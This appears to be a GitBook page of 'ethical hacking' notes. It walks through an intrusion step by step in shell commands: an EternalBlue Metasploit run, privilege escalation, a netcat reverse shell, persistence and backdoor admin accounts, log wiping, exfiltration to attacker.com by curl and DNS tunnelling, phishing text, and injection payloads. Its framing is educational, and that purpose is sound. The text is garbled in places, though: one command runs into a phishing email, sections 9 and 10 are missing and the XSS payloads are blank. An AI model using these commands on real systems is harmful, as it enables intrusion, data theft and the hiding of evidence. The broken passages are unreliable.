> For the complete documentation index, see [llms.txt](https://mainekhacker-1.gitbook.io/mainekhacker/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mainekhacker-1.gitbook.io/mainekhacker/complete-system-hacking-notes.md). # Complete System Hacking Notes: ## Complete System Hacking Notes for Ethical Hackers ### 1. Introduction to System Hacking **System Hacking** involves identifying and exploiting vulnerabilities in computer systems to assess security weaknesses. Ethical hackers perform these activities with proper authorization to help organizations improve their security posture. **Legal Framework:** * Always obtain written permission before testing * Operate within defined scope and rules of engagement * Follow responsible disclosure practices *** ### 2. Footprinting and Reconnaissance #### Passive Reconnaissance Gathering information without directly interacting with the target. Example - WHOIS Lookup: ```bash whois example.com # Returns: Domain owner, registrar, name servers, creation date ``` Example - DNS Enumeration: ```bash nslookup example.com dig example.com ANY # Reveals: IP addresses, mail servers, DNS records ``` #### Active Reconnaissance Direct interaction with target systems. Example - Ping Sweep: ```bash ping 192.168.1.1 # Checks if host is alive ``` *** ### 3. Scanning and Enumeration #### Network Scanning Example - Nmap TCP Connect Scan: ```bash nmap -sT 192.168.1.100 # Completes full TCP handshake, detectable but reliable ``` Example - Stealth SYN Scan: ```bash nmap -sS 192.168.1.100 # Half-open scan, harder to detect ``` Example - Service Version Detection: ```bash nmap -sV -p 80,443,22 192.168.1.100 # Output: 22/tcp open ssh OpenSSH 7.4 # 80/tcp open http Apache 2.4.6 ``` #### Enumeration Example - NetBIOS Enumeration: ```bash nbtscan 192.168.1.0/24 # Reveals: Computer names, workgroups, MAC addresses ``` Example - SNMP Enumeration: ```bash snmpwalk -v2c -c public 192.168.1.1 # Extracts: System information, network interfaces, running processes ``` *** ### 4. Gaining Access #### Password Cracking Example - Dictionary Attack with John the Ripper: ```bash john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # Attempts common passwords from wordlist # Result: admin:password123 (cracked in 2 minutes) ``` Example - Brute Force with Hashcat: ```bash hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a # -m 0: MD5 hash type # -a 3: Brute-force attack # ?a: All characters (uppercase, lowercase, digits, symbols) ``` #### Exploitation Example - Using Metasploit: ```bash msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.50 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.10 exploit # Exploits EternalBlue vulnerability in Windows SMB ``` *** ### 5. Privilege Escalation #### Linux Privilege Escalation Example - Exploiting SUID Binaries: ```bash # Find SUID binaries find / -perm -4000 2>/dev/null # If /usr/bin/find has SUID bit: find /home -exec whoami \; # Executes as root, showing "root" # Escalate to root shell find /home -exec /bin/bash -p \; ``` Example - Kernel Exploit: ```bash # Check kernel version uname -a # Output: Linux 3.13.0-24-generic # Search for exploit searchsploit linux kernel 3.13 # Use Dirty COW or similar exploit ``` #### Windows Privilege Escalation Example - Unquoted Service Path: ```bash # Find vulnerable service wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows" # If path is: C:\Program Files\My Service\service.exe # Place malicious executable at: C:\Program.exe # System will execute our file when service starts ``` *** ### 6. Maintaining Access #### Creating Backdoors Example - Netcat Reverse Shell: ```bash # On attacker machine (listening) nc -lvp 4444 # On victim machine nc 192.168.1.10 4444 -e /bin/bash # Connects back to attacker, providing shell access ``` Example - Metasploit Persistence: ```bash # After gaining meterpreter session run persistence -X -i 10 -p 4444 -r 192.168.1.10 # -X: Start on boot # -i: Connect every 10 seconds # Maintains access even after reboot ``` Example - Adding User Account: ```bash # Linux useradd -m -s /bin/bash backdoor echo "backdoor:P@ssw0rd" | chpasswd usermod -aG sudo backdoor # Windows net user backdoor P@ssw0rd /add net localgroup administrators backdoor /add ``` *** ### 7. Covering Tracks #### Log Manipulation Example - Clearing Linux Logs: ```bash # Clear bash history history -c cat /dev/null > ~/.bash_history # Clear system logs echo "" > /var/log/auth.log echo "" > /var/log/syslog # Clear last login records echo "" > /var/log/wtmp echo "" > /var/log/btmp ``` Example - Windows Event Log Clearing: ```powershell # Using PowerShell Clear-EventLog -LogName Security Clear-EventLog -LogName System Clear-EventLog -LogName Application # Or using wevtutil wevtutil cl Security wevtutil cl System ``` #### Timestamp Manipulation Example - Modifying File Timestamps: ```bash # Linux - using touch touch -t 202001011200 malicious.sh # Sets timestamp to Jan 1, 2020, 12:00 # View to verify ls -l malicious.sh ``` *** ### 8. Data Exfiltration Example - Using HTTP Tunneling: ```bash # Compress and encode data tar -czf - /sensitive/data | base64 > data.txt # Send via HTTP POST curl -X POST -d @data.txt http://attacker.com/receive.php ``` Example - DNS Tunneling: ```bash # Split data into DNS queries cat secretfile.txt | xxd -p | while read line; do dig $line.attacker.com; done # Data exfiltrated through DNS queries ``` Example - FTP Exfiltration: ```bash # Automated FTP upload script ftp -n 192.168.1.10 < Subject: URGENT: Password Reset Required Your password will expire in 24 hours. Click here to reset: http://evil-site.com/reset [Legitimate-looking login page captures credentials] ``` Example - Pretexting Call: "Hello, this is John from IT support. We're experiencing network issues and need to verify your credentials to restore your access. Can you confirm your username?" *** ### 11. Web Application Hacking Example - SQL Injection: ```sql # Login form bypass Username: admin' OR '1'='1 Password: anything # Resulting query: SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything' # Always true, grants access ``` Example - Cross-Site Scripting (XSS): ```html # Reflected XSS in search parameter http://vulnerable-site.com/search?q= # Stored XSS in comment field ``` Example - Command Injection: ```bash # Vulnerable ping function http://site.com/ping?ip=8.8.8.8; cat /etc/passwd # Executes: ping 8.8.8.8; cat /etc/passwd # Returns password file contents ``` *** ### 12. Malware Analysis #### Static Analysis ```bash # Check file type file suspicious.exe # Output: PE32 executable # Extract strings strings suspicious.exe | grep -i "http" # Reveals: http://malicious-c2.com/callback # Calculate hash md5sum suspicious.exe sha256sum suspicious.exe ``` #### Dynamic Analysis in Sandbox ``` # Run in isolated environment # Monitor: Network connections, file modifications, registry changes # Observed behavior: # - Connects to 192.168.1.100:4444 # - Creates C:\Windows\Temp\backdoor.exe # - Modifies HKLM\Software\Microsoft\Windows\CurrentVersion\Run ``` *** ### 13. Post-Exploitation Example - Network Mapping: ```bash # From compromised host, scan internal network for i in {1..254}; do ping -c 1 192.168.1.$i & done # Enumerate shares smbclient -L //192.168.1.50 -N ``` Example - Credential Harvesting: ```bash # Dump Windows credentials meterpreter > hashdump # Output: Administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 # Linux - extract password hashes cat /etc/shadow ``` *** ### 14. Defense Mechanisms Example - Intrusion Detection: ```bash # Snort rule to detect port scan alert tcp any any -> 192.168.1.0/24 any (flags: S; msg:"Possible SYN scan"; sid:1000001;) ``` Example - Patch Management: ```bash # Ubuntu/Debian apt update apt list --upgradable apt upgrade # Check for specific vulnerability dpkg -l | grep openssl # Verify version is patched ``` *** ### Best Practices for Ethical Hackers 1. Always get written authorization before testing 2. Document everything - screenshots, commands, findings 3. Use staging environments when possible 4. Follow responsible disclosure - give vendors time to patch 5. Stay within scope - never exceed authorized targets 6. Keep learning - new vulnerabilities emerge daily 7. Use tools responsibly - understand what each command does 8. Protect client data - encrypt findings, secure communications 9. Provide actionable remediation steps in reports 10. Maintain confidentiality of all discovered vulnerabilities *** ### Additional Resources * Practice Platforms: HackTheBox, TryHackMe, DVWA, WebGoat * Certifications: CEH, OSCP, GPEN * Communities: Reddit r/netsec, GitHub security repos * Stay Updated: CVE databases, security blogs, Twitter infosec community Remember: The goal of ethical hacking is to improve security, not to cause harm. Always operate within legal boundaries and with proper authorization. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mainekhacker-1.gitbook.io/mainekhacker/complete-system-hacking-notes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.